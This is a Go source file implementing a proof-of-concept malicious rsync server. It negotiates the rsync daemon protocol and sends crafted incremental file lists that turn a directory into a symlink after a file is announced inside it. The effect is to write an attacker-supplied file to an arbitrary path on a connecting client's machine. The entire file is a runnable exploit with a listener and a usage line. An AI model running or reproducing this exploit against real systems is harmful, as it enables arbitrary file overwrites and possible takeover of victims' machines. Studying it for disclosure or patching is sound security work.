package main

import (
	"crypto/md5"
	"fmt"
	"net"
	"os"
	"path/filepath"
	"strings"

	"cvr.google.com/pkg/client"

	"flag"
)

const (
	// IncRecurse is the compat-flags value written to the client during
	// negotiation (see poc); it sets the inc_recurse bit so directory
	// contents are delivered as separate, incremental file lists.
	IncRecurse = 1

	// FileListOffset is the offset applied to negative indexes that announce
	// that another file list follows (poc writes -1-FileListOffset and
	// -2-FileListOffset before sending additional lists).
	FileListOffset = 101
)

// makeClientDownloadItem announces file to the peer as an item.
//
// It looks up the index of file within rootFl, writes that index to srv, and
// then writes the item flags. The flags are client.ItemTransferFlag when
// transfer is true and 0 otherwise. Any failure is printed to stderr and
// returned unchanged.
func makeClientDownloadItem(file *client.File, rootFl *client.FileList, srv *client.RsyncClient, transfer bool) error {
	ndx, err := rootFl.IndexFor(file)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to get target index: %v\n", err)
		return err
	}

	var itemFlags int
	if transfer {
		itemFlags = client.ItemTransferFlag
	}

	// The index always precedes the item flags on the wire.
	if err := srv.WriteNdx(ndx); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write target index: %v\n", err)
		return err
	}
	if err := srv.WriteShortInt(itemFlags); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write transfer flags: %v\n", err)
		return err
	}
	return nil
}

// writeNdxAndAttrs writes an item header to srv.
//
// The header is the index ndx, followed by the item flags. Two optional
// fields follow only when their flag bit is set:
//   - the basis type byte, when client.ItemBasisTypeFollows is set;
//   - the xname string, when client.ItemXnameFollows is set.
//
// This is the same field order that handleSenderProxy reads. The first write
// error is returned, wrapped with the name of the field being written, and the
// remaining fields are not written. Previously all write errors were
// discarded and nil was always returned.
func writeNdxAndAttrs(srv *client.RsyncClient, ndx int, flags int, basisType byte, xname string) error {
	if err := srv.WriteNdx(ndx); err != nil {
		return fmt.Errorf("writing ndx %d: %w", ndx, err)
	}
	if err := srv.WriteShortInt(flags); err != nil {
		return fmt.Errorf("writing item flags: %w", err)
	}
	if flags&client.ItemBasisTypeFollows != 0 {
		if err := srv.WriteByte(basisType); err != nil {
			return fmt.Errorf("writing basis type: %w", err)
		}
	}
	if flags&client.ItemXnameFollows != 0 {
		if err := srv.WriteVString(xname); err != nil {
			return fmt.Errorf("writing xname: %w", err)
		}
	}
	return nil
}

// handleSenderProxy services one index message from the client, standing in
// for the sender side of the transfer (the logic of rsync's send_files).
//
// A non-negative index is handled as follows:
//   - The item flags are read, plus the optional basis type byte and xname.
//   - Without client.ItemTransferFlag, the header is echoed back and the
//     function returns.
//   - Otherwise the sum head (count, blength, s2length, remainder) and the
//     per-block sums are read, and the sums are discarded.
//   - The header and sum head are echoed back, targetFile.Content and
//     targetFile.Digest are sent, and an exit message follows.
//
// An index equal to client.NdxDone is answered with NdxDone. Any other
// negative index is ignored.
//
// It returns true once the file has been sent and the client should exit.
// Errors from reads and from the echoed header/sum head are returned.
func handleSenderProxy(srv *client.RsyncClient, targetFile *client.File) (bool, error) {
	ndx, err := srv.ReadNdx()
	if err != nil {
		return false, err
	}

	if ndx < 0 {
		if ndx == client.NdxDone {
			return false, srv.WriteNdx(client.NdxDone)
		}
		return false, nil
	}

	// Item header: flags, then the optional basis type and xname.
	flags, err := srv.ReadShortInt()
	if err != nil {
		return false, err
	}

	var basisType byte
	if flags&client.ItemBasisTypeFollows != 0 {
		if basisType, err = srv.ReadByte(); err != nil {
			return false, err
		}
	}

	var xname string
	if flags&client.ItemXnameFollows != 0 {
		if xname, err = srv.ReadVString(); err != nil {
			return false, err
		}
	}

	// If we're not transferring the file, no sums follow: echo and finish.
	if flags&client.ItemTransferFlag == 0 {
		return false, writeNdxAndAttrs(srv, ndx, flags, basisType, xname)
	}

	// Sum head sent by the client.
	count, err := srv.ReadInt()
	if err != nil {
		return false, err
	}
	blength, err := srv.ReadInt()
	if err != nil {
		return false, err
	}
	s2length, err := srv.ReadInt()
	if err != nil {
		return false, err
	}
	remainder, err := srv.ReadInt()
	if err != nil {
		return false, err
	}

	// s2length comes from the peer; a negative value would make the
	// allocation below panic and take down the whole process.
	if s2length < 0 {
		return false, fmt.Errorf("invalid sum head: negative s2length %d", s2length)
	}

	// The per-block sums are not relayed to the client; consume and discard
	// them. Each block is an int (via ReadInt) followed by s2length bytes.
	sum2buf := make([]byte, s2length)
	for i := 0; i < count; i++ {
		if _, err := srv.ReadInt(); err != nil {
			return false, err
		}
		if err := srv.Read(sum2buf); err != nil {
			return false, err
		}
	}

	// Echo the item header and the sum head back.
	if err := writeNdxAndAttrs(srv, ndx, flags, basisType, xname); err != nil {
		return false, err
	}
	for _, v := range []int{count, blength, s2length, remainder} {
		if err := srv.WriteRawInt(v); err != nil {
			return false, err
		}
	}

	// If this is a file transfer, most likely it's the targetFile.
	// TODO: Make this PoC compatible with multiple file transfers
	// NOTE(review): results (if any) of SendToken and Write are not checked
	// here; propagate them once their signatures are confirmed.
	srv.SendToken(targetFile.Content)
	srv.Write(targetFile.Digest)

	// We're now done with the PoC. Tell the client to exit.
	return true, srv.SendExitMessage()
}

// poc runs one rsync daemon session on conn.
//
// It proceeds in these steps:
//  1. It sends the daemon greeting and reads the client's greeting.
//  2. It reads the module line; a "#list" request is answered and the
//     session ends.
//  3. It reads the client's arguments, sends the compat flags and the checksum
//     seed taken from the -checksum_seed flag, then enables multiplexing and
//     discards the client's filter list.
//  4. It sends four file lists, in this order:
//     - the root directory and "trampoline";
//     - a directory "trampoline/link";
//     - a regular file named after the base name of targetFileName inside
//       "trampoline/link", whose content and digest are sourceContents and
//       sourceChecksum;
//     - "trampoline/link" redefined as a symlink to the directory of
//       targetFileName.
//  5. It answers the client's index requests via handleSenderProxy until that
//     reports completion.
//
// Errors are printed to stderr and end the session. srv is closed on return.
func poc(conn net.Conn, sourceContents []byte, sourceChecksum []byte, targetFileName string) {
	srv := client.NewRsyncServer(conn)
	defer srv.Close()

	// Prologue: the daemon greeting.
	srv.WriteLineOld("@RSYNCD: 31.0 md5")

	// Consume the client's greeting; its content is not used.
	if _, err := srv.ReadLine(); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read line: %v\n", err)
		return
	}

	// The next line is either the module or the listing command.
	line, err := srv.ReadLine()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read line: %v\n", err)
		return
	}

	// If they're just listing, we're done.
	if line == "#list" {
		srv.WriteLineOld("files")
		return
	}

	srv.WriteLineOld("@RSYNCD: OK")

	// The client sends its arguments one per line, terminated by an empty line.
	var arguments strings.Builder
	for {
		arg, err := srv.ReadLine()
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to read line: %v\n", err)
			return
		}
		if arg == "" {
			break
		}
		arguments.WriteString(arg)
		arguments.WriteByte(' ')
	}

	fmt.Printf("[*] Client %v connected with arguments: %s\n", conn.RemoteAddr(), arguments.String())

	// Compat flags: set the inc_recurse flag.
	if err = srv.WriteVarInt(IncRecurse); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write compat flags: %v\n", err)
		return
	}

	// TODO: The client sometimes sends negotiation strings. We should probably handle those
	// as well.

	// Send the checksum seed configured by -checksum_seed (default 1337).
	if err = srv.WriteRawInt(*checksumSeed); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write checksum seed: %v\n", err)
		return
	}

	// From here on, traffic is multiplexed.
	srv.EnableMultiPlexOutbound()
	srv.EnableMultiPlexInbound()

	// The client now sends filter rules as length + filter, ending with a 0 length.
	for {
		filterLen, err := srv.ReadInt()
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to read filter length: %v\n", err)
			return
		}
		if filterLen == 0 {
			break
		}
		// The length comes from the peer; a negative value would panic in make.
		if filterLen < 0 {
			fmt.Fprintf(os.Stderr, "Failed to read filter: invalid length %d\n", filterLen)
			return
		}
		if err := srv.Read(make([]byte, filterLen)); err != nil {
			fmt.Fprintf(os.Stderr, "Failed to read filter: %v\n", err)
			return
		}
	}

	// First file list: the root directory and "trampoline".
	rootFl := client.NewFileList()
	rootFl.AddDir(".")
	rootFl.AddDir("trampoline")
	if err = rootFl.Send(srv); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send file list: %v\n", err)
		return
	}

	// Second file list: creates directory "link" inside "trampoline". This
	// directory is changed into a symlink later.
	if err = srv.WriteNdx(-1 - FileListOffset); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write file list index: %v\n", err)
		return
	}
	subdirFl := rootFl.NewChildList()
	subdirFl.AddDir("./trampoline/link")
	if err = subdirFl.Send(srv); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send file list: %v\n", err)
		return
	}

	// Third file list: the contents of directory "link".
	if err = srv.WriteNdx(-2 - FileListOffset); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write file list index: %v\n", err)
		return
	}
	fileFl := rootFl.NewChildList()
	targetFileBasename := filepath.Base(targetFileName)
	targetFile := fileFl.AddRegularFile(fmt.Sprintf("./trampoline/link/%s", targetFileBasename), sourceContents)
	targetFile.Digest = sourceChecksum
	if err = fileFl.Send(srv); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send file list: %v\n", err)
		return
	}

	// Fourth file list for the same directory: its type changes to a symlink.
	if err = srv.WriteNdx(-1 - FileListOffset); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write file list index: %v\n", err)
		return
	}
	symlinkFl := rootFl.NewChildList()
	symlinkFl.AddSymlink("./trampoline/link", filepath.Dir(targetFileName))
	if err = symlinkFl.Send(srv); err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send file list: %v\n", err)
		return
	}

	// Handle any indexes that come our way until the proxy reports completion.
	for {
		done, err := handleSenderProxy(srv, targetFile)
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to handle sender proxy: %v\n", err)
			return
		}
		if done {
			break
		}
	}

	fmt.Println("[+] Dropped file on client's machine. Closing connection")
}

// Command-line flags, registered on the default flag set.
var (
	// port is the TCP port to listen on (-port, default 1337).
	port = flag.Int("port", 1337, "port to listen on")

	// checksumSeed is the value of the -checksum_seed flag (default 1337).
	checksumSeed = flag.Int("checksum_seed", 1337, "checksum seed to use")
)

// main parses the command line, loads the source file, and serves poc on
// -port, one goroutine per accepted connection.
//
// Usage: poc [-port N] [-checksum_seed N] sourceFile:targetFilePath
//
// The argument is split at the first ':' only, so targetFilePath may itself
// contain colons. Both parts must be non-empty. Any setup or accept failure
// exits with status 1.
func main() {
	flag.Parse()
	args := flag.Args()
	if len(args) != 1 {
		fmt.Println("Usage: poc sourceFile:targetFilePath")
		os.Exit(1)
	}

	fileParts := strings.SplitN(args[0], ":", 2)
	if len(fileParts) != 2 || fileParts[0] == "" || fileParts[1] == "" {
		fmt.Println("Usage: poc sourceFile:targetFilePath")
		os.Exit(1)
	}
	sourceFile := fileParts[0]
	targetFile := fileParts[1]

	// Read the file and compute its MD5 once, up front; both are shared
	// read-only by every connection.
	sourceContents, err := os.ReadFile(sourceFile)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read source file: %v\n", err)
		os.Exit(1)
	}
	digest := md5.Sum(sourceContents)
	sourceChecksum := digest[:]

	listener, err := net.Listen("tcp", fmt.Sprintf(":%d", *port))
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to listen: %v\n", err)
		os.Exit(1)
	}

	fmt.Printf("[*] Listening on port %v\n", *port)
	for {
		conn, err := listener.Accept()
		if err != nil {
			fmt.Fprintf(os.Stderr, "Failed to accept: %v\n", err)
			os.Exit(1)
		}

		fmt.Println("[*] New connection from ", conn.RemoteAddr())
		go poc(conn, sourceContents, sourceChecksum, targetFile)
	}
}
